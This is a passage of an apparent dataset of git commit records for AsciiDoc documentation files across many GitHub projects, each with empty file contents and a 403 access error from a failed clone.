<2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e4e12773cd7ff0674ff8bce9444b7b63bd42677","subject":"more document edit\/cleanup","message":"more document edit\/cleanup\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"draft_trex_stateless.asciidoc","new_file":"draft_trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de262f0e70ec40053635ac2389e9b41bb7deef79","subject":"Inital import of yabar manpage into asciidoc","message":"Inital import of yabar manpage into asciidoc\n","repos":"geommer\/yabar","old_file":"doc\/yabar.1.asciidoc","new_file":"doc\/yabar.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/geommer\/yabar.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a1ba7484c3719fbd805a675715202afcb1f02fd","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07522fe6725d50582bcf26e29289ef588218cc67","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5503505ea2bddee8b0d5dce65244dbcdad93b699","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a082b6384745e8fa5f2f575716d29675dbad5bc","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b36fb052c10eea5b248bfab71e5caffaf51ef92","subject":"Update completion-suggest.asciidoc (#24506)","message":"Update completion-suggest.asciidoc (#24506)\n\n","repos":"robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,shreejay\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch","old_file":"docs\/reference\/search\/suggesters\/completion-suggest.asciidoc","new_file":"docs\/reference\/search\/suggesters\/completion-suggest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"826765f7cf6cbdd0d3fc169bfbbdbbee3931f686","subject":"Update 2016-06-12-This-is-another-post.adoc","message":"Update 2016-06-12-This-is-another-post.adoc","repos":"thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress","old_file":"_posts\/2016-06-12-This-is-another-post.adoc","new_file":"_posts\/2016-06-12-This-is-another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thesagarsutar\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ba5637f46c4157cf37fadc7c80db871340f8bc2","subject":"CL: Fix library name","message":"CL: Fix library name\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"77781fcddce6b329f3c4f4420fdd51dd5c9fb19e","subject":"Added school section","message":"Added school section\n","repos":"andrewazores\/homepage","old_file":"school.adoc","new_file":"school.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"358ba4ff52697303b8c2f797789090b82e9ca11f","subject":"Added Ruby language to Gitbook","message":"Added Ruby language to Gitbook\n","repos":"bhaveshdt\/camel,anoordover\/camel,DariusX\/camel,Thopap\/camel,sverkera\/camel,lburgazzoli\/camel,tkopczynski\/camel,veithen\/camel,driseley\/camel,JYBESSON\/camel,akhettar\/camel,akhettar\/camel,gautric\/camel,dmvolod\/camel,Thopap\/camel,jamesnetherton\/camel,zregvart\/camel,hqstevenson\/camel,CodeSmell\/camel,salikjan\/camel,mgyongyosi\/camel,ssharma\/camel,chirino\/camel,drsquidop\/camel,christophd\/camel,sverkera\/camel,scranton\/camel,hqstevenson\/camel,snurmine\/camel,apache\/camel,ullgren\/camel,christophd\/camel,ssharma\/camel,christophd\/camel,RohanHart\/camel,rmarting\/camel,onders86\/camel,NickCis\/camel,lburgazzoli\/camel,gautric\/camel,pmoerenhout\/camel,dmvolod\/camel,rmarting\/camel,pmoerenhout\/camel,acartapanis\/camel,jonmcewen\/camel,mgyongyosi\/camel,driseley\/camel,ullgren\/camel,tadayosi\/camel,gilfernandes\/camel,chirino\/camel,bgaudaen\/camel,bgaudaen\/camel,mcollovati\/camel,snurmine\/camel,yuruki\/camel,sabre1041\/camel,mgyongyosi\/camel,drsquidop\/camel,Fabryprog\/camel,jonmcewen\/camel,acartapanis\/camel,yuruki\/camel,tlehoux\/camel,nicolaferraro\/camel,veithen\/camel,alvinkwekel\/camel,prashant2402\/camel,veithen\/camel,bhaveshdt\/camel,nicolaferraro\/camel,anoordover\/camel,pax95\/camel,RohanHart\/camel,RohanHart\/camel,davidkarlsen\/camel,curso007\/camel,hqstevenson\/camel,isavin\/camel,jarst\/camel,RohanHart\/camel,Thopap\/camel,tdiesler\/camel,pmoerenhout\/camel,Thopap\/camel,neoramon\/camel,christophd\/camel,DariusX\/camel,onders86\/camel,adessaigne\/camel,akhettar\/camel,salikjan\/camel,prashant2402\/camel,w4tson\/camel,adessaigne\/camel,sabre1041\/camel,gnodet\/camel,lburgazzoli\/camel,nikhilvibhav\/camel,neoramon\/camel,gnodet\/camel,veithen\/camel,bgaudaen\/camel,driseley\/camel,lburgazzoli\/camel,sabre1041\/camel,yuruki\/camel,drsquidop\/camel,sabre1041\/camel,pax95\/camel,ssharma\/camel,neoramon\/camel,NickCis\/camel,bgaudaen\/camel,tadayosi\/camel,sverkera\/camel,dmvolod\/camel,tadayosi\/camel,sirlatrom\/camel,DariusX\/camel,tadayosi\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,pkletsko\/camel,acartapanis\/camel,curso007\/camel,JYBESSON\/camel,rmarting\/camel,chirino\/camel,CodeSmell\/camel,scranton\/camel,dmvolod\/camel,isavin\/camel,cunningt\/camel,jarst\/camel,apache\/camel,sverkera\/camel,sabre1041\/camel,jamesnetherton\/camel,sirlatrom\/camel,scranton\/camel,drsquidop\/camel,rmarting\/camel,anoordover\/camel,gilfernandes\/camel,drsquidop\/camel,pkletsko\/camel,driseley\/camel,curso007\/camel,Thopap\/camel,jonmcewen\/camel,sverkera\/camel,gautric\/camel,jarst\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,JYBESSON\/camel,curso007\/camel,isavin\/camel,scranton\/camel,punkhorn\/camel-upstream,acartapanis\/camel,jarst\/camel,prashant2402\/camel,punkhorn\/camel-upstream,gilfernandes\/camel,RohanHart\/camel,nboukhed\/camel,w4tson\/camel,tdiesler\/camel,objectiser\/camel,neoramon\/camel,NickCis\/camel,Fabryprog\/camel,JYBESSON\/camel,lburgazzoli\/camel,yuruki\/camel,sverkera\/camel,nboukhed\/camel,tkopczynski\/camel,apache\/camel,mcollovati\/camel,chirino\/camel,NickCis\/camel,cunningt\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,nikhilvibhav\/camel,JYBESSON\/camel,veithen\/camel,DariusX\/camel,veithen\/camel,w4tson\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,gilfernandes\/camel,bhaveshdt\/camel,bhaveshdt\/camel,adessaigne\/camel,RohanHart\/camel,mcollovati\/camel,jarst\/camel,sabre1041\/camel,anoordover\/camel,akhettar\/camel,ullgren\/camel,anton-k11\/camel,adessaigne\/camel,kevinearls\/camel,jonmcewen\/camel,rmarting\/camel,akhettar\/camel,ssharma\/camel,onders86\/camel,tdiesler\/camel,curso007\/camel,cunningt\/camel,jamesnetherton\/camel,snurmine\/camel,anton-k11\/camel,gnodet\/camel,jkorab\/camel,driseley\/camel,cunningt\/camel,apache\/camel,sirlatrom\/camel,Thopap\/camel,tadayosi\/camel,prashant2402\/camel,mgyongyosi\/camel,anoordover\/camel,dmvolod\/camel,anton-k11\/camel,sirlatrom\/camel,tadayosi\/camel,nboukhed\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,bgaudaen\/camel,allancth\/camel,cunningt\/camel,bhaveshdt\/camel,jkorab\/camel,hqstevenson\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,Fabryprog\/camel,sirlatrom\/camel,yuruki\/camel,kevinearls\/camel,objectiser\/camel,gnodet\/camel,tlehoux\/camel,anton-k11\/camel,bgaudaen\/camel,neoramon\/camel,anoordover\/camel,mgyongyosi\/camel,ssharma\/camel,davidkarlsen\/camel,tkopczynski\/camel,allancth\/camel,mcollovati\/camel,pkletsko\/camel,NickCis\/camel,tlehoux\/camel,ullgren\/camel,davidkarlsen\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,kevinearls\/camel,w4tson\/camel,nikhilvibhav\/camel,snurmine\/camel,christophd\/camel,tkopczynski\/camel,cunningt\/camel,tdiesler\/camel,allancth\/camel,Fabryprog\/camel,jamesnetherton\/camel,CodeSmell\/camel,pkletsko\/camel,onders86\/camel,nboukhed\/camel,allancth\/camel,pax95\/camel,gautric\/camel,objectiser\/camel,anton-k11\/camel,zregvart\/camel,gilfernandes\/camel,sirlatrom\/camel,zregvart\/camel,pax95\/camel,neoramon\/camel,gnodet\/camel,adessaigne\/camel,dmvolod\/camel,nboukhed\/camel,jarst\/camel,rmarting\/camel,gautric\/camel,ssharma\/camel,tkopczynski\/camel,gautric\/camel,curso007\/camel,akhettar\/camel,chirino\/camel,snurmine\/camel,chirino\/camel,nboukhed\/camel,pmoerenhout\/camel,allancth\/camel,lburgazzoli\/apache-camel,nikhilvibhav\/camel,bhaveshdt\/camel,tdiesler\/camel,kevinearls\/camel,yuruki\/camel,tlehoux\/camel,prashant2402\/camel,hqstevenson\/camel,tdiesler\/camel,JYBESSON\/camel,w4tson\/camel,davidkarlsen\/camel,apache\/camel,jonmcewen\/camel,NickCis\/camel,jkorab\/camel,pkletsko\/camel,w4tson\/camel,gilfernandes\/camel,CodeSmell\/camel,pkletsko\/camel,objectiser\/camel,acartapanis\/camel,kevinearls\/camel,isavin\/camel,mgyongyosi\/camel,scranton\/camel,driseley\/camel,punkhorn\/camel-upstream,jkorab\/camel,adessaigne\/camel,jamesnetherton\/camel,zregvart\/camel,snurmine\/camel,isavin\/camel,jkorab\/camel,allancth\/camel,tlehoux\/camel,kevinearls\/camel,jkorab\/camel,isavin\/camel,apache\/camel,onders86\/camel,drsquidop\/camel,prashant2402\/camel,alvinkwekel\/camel,tlehoux\/camel,scranton\/camel,pax95\/camel,onders86\/camel,anton-k11\/camel,nicolaferraro\/camel,christophd\/camel,jamesnetherton\/camel,hqstevenson\/camel","old_file":"components\/camel-script\/src\/main\/docs\/ruby-language.adoc","new_file":"components\/camel-script\/src\/main\/docs\/ruby-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3dce11859f27706555cd1c1a1cf7ca2620714364","subject":"Deleted _posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","message":"Deleted _posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8952551440d1b95c3b7446b02e57cbd0bd264c6","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dcdda5f4bb133dcb0c7bb373669334d04c93bdd","subject":"Update 2016-02-12-Interface-became-awesome-in-Java-8.adoc","message":"Update 2016-02-12-Interface-became-awesome-in-Java-8.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-02-12-Interface-became-awesome-in-Java-8.adoc","new_file":"_posts\/2016-02-12-Interface-became-awesome-in-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c288cce3cbbe30941964d9f3a1ab24b73b66c5bf","subject":"Update 2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","message":"Update 2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","new_file":"_posts\/2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0aeae9aa4da59ebb946f4255ade9e0644aa22f0","subject":"Add logging conventions to the development doc","message":"Add logging conventions to the development doc\n","repos":"jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0f38c6883bcc0e8bcd18feeb13f3e8fbba32a15","subject":"Update 2016-02-09-My-title2.adoc","message":"Update 2016-02-09-My-title2.adoc","repos":"pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io","old_file":"_posts\/2016-02-09-My-title2.adoc","new_file":"_posts\/2016-02-09-My-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pej\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fe1fd82fa2dc3bc2d2f0164865a2be66d5bb430","subject":"Update 2018-11-25-Amazon-Go.adoc","message":"Update 2018-11-25-Amazon-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4aa56e9d1fbac7ab851f6db5c347acac319b957","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"771aa053fa160cd9a9e04ca12df9e79465f4932b","subject":"Shorter and modernized and commented out Papyrus","message":"Shorter and modernized and commented out Papyrus\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9565e65c0f1ef89d08811eafc9908fa2df72a0ab","subject":"Update donts.adoc","message":"Update donts.adoc\n\nCleaned up list.\r\nDeleted unnecessary new line characters.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/contributions\/tonegodgui\/donts.adoc","new_file":"src\/docs\/asciidoc\/jme3\/contributions\/tonegodgui\/donts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"85abceb087307e2806002e066ea64d40fc6318e2","subject":"Changes to documentation","message":"Changes to documentation\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e633fd078f626f83c50ee817fd1b6b1fcf46dd85","subject":"Correction of url in documentation","message":"Correction of url in documentation\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e308efd130b3c31b6aee69fc4ba1e44ac681f4d","subject":"Create typescript.adoc","message":"Create typescript.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"typescript.adoc","new_file":"typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"cce3d4fcc13a274c419836c4873ac87a3622db0f","subject":"y2b create post Samsung Galaxy Note 3 Unboxing!","message":"y2b create post Samsung Galaxy Note 3 Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-26-Samsung-Galaxy-Note-3-Unboxing.adoc","new_file":"_posts\/2013-09-26-Samsung-Galaxy-Note-3-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 